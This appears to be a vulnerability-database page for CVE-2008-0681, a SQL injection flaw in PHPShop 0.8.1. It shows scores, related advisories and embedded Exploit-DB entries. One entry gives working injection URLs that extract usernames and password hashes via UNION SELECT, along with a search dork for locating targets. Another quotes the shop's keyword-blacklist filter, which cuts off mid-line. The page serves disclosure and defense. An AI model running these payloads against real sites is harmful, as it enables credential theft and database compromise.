CVE-2008-0681
published 2008-02-12CVE-2008-0681: SQL injection vulnerability in index.php in PHPShop 0.8.1 allows remote attackers to execute arbitrary SQL commands via the product_id parameter, as…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.99%
78.2th percentile
SQL injection vulnerability in index.php in PHPShop 0.8.1 allows remote attackers to execute arbitrary SQL commands via the product_id parameter, as demonstrated by a shop/flypage action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpshop | phpshop | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wwv2-hq48-3mr9: Multiple SQL injection vulnerabilities in index
ghsa_unreviewed·2022-05-02·CVSS 6.8
CVE-2009-4571 [MEDIUM] CWE-89 GHSA-wwv2-hq48-3mr9: Multiple SQL injection vulnerabilities in index
Multiple SQL injection vulnerabilities in index.php in PhpShop 0.8.1 allow remote attackers to execute arbitrary SQL commands via the (1) module_id parameter in an admin/function_list action, the (2) vendor_id parameter in a vendor/vendor_form action, the (3) module_id parameter in an admin/module_form action, the (4) user_id parameter in an admin/user_form action, the (5) vendor_category_id parameter in a vendor/vendor_category_form action, the (6) user_id parameter in a store/user_form action, the (7) payment_method_id parameter in a store/payment_method_form action, the (8) tax_rate_id parameter in a tax/tax_form action, or the (9) category parameter in a shop/browse action. NOTE: the product_id vector is already covered by CVE-2008-0681.
GHSA
GHSA-wg47-xqc5-g367: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-0681 [MEDIUM] CWE-89 GHSA-wg47-xqc5-g367: SQL injection vulnerability in index
SQL injection vulnerability in index.php in PHPShop 0.8.1 allows remote attackers to execute arbitrary SQL commands via the product_id parameter, as demonstrated by a shop/flypage action.
No detection rules found.
Exploit-DB
phpShop 2.0 - SQL Injection
exploitdb·2013-01-14
CVE-2009-4571 phpShop 2.0 - SQL Injection
phpShop 2.0 - SQL Injection
---
# Exploit Title : phpshop 2.0 SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://code.google.com/p/phpshop/downloads/list
# tested : windows 7 / ubuntu
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
SQLi p0c:
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
Exploit-DB
phpShop 0.8.1 - SQL Injection / Filter Bypass
exploitdb·2008-02-02
CVE-2008-0681 phpShop 0.8.1 - SQL Injection / Filter Bypass
phpShop 0.8.1 - SQL Injection / Filter Bypass
---
Vendor : PHPShop
Webiste : http://www.phpshop.org
Version : v0.8.1
Author: the redc0ders / theredc0ders[at]gmail[dot]com
Condition: magic_quote_gpc = off , in php.ini setting
Details :
Vulnerable Code in index.php near lines 98 - 128
[code]
// basic SQL inject detection
$my_insecure_array = array('keyword' => $_REQUEST['keyword'],
'category_id' => $_REQUEST['category_id'],
'product_id' => $_REQUEST['product_id'],
'user_id' => $_REQUEST['user_id'],
'user_info_id' => $_REQUEST['user_info_id'],
'page' => $_REQUEST['page'],
'func' => $_REQUEST['func']);
while(list($key,$value)=each($my_insecure_array)) {
if (stristr($value,'FROM ') ||
stristr($value,'UPDATE ') ||
stristr($value,'WHERE ') ||
stristr($value,'ALTER ') ||
stristr($value,'SELEC
No writeups or analysis indexed.
http://securityreason.com/securityalert/3628http://www.securityfocus.com/archive/1/487435/100/0/threadedhttp://www.securityfocus.com/bid/27570https://www.exploit-db.com/exploits/5041http://securityreason.com/securityalert/3628http://www.securityfocus.com/archive/1/487435/100/0/threadedhttp://www.securityfocus.com/bid/27570https://www.exploit-db.com/exploits/5041
2008-02-12
Published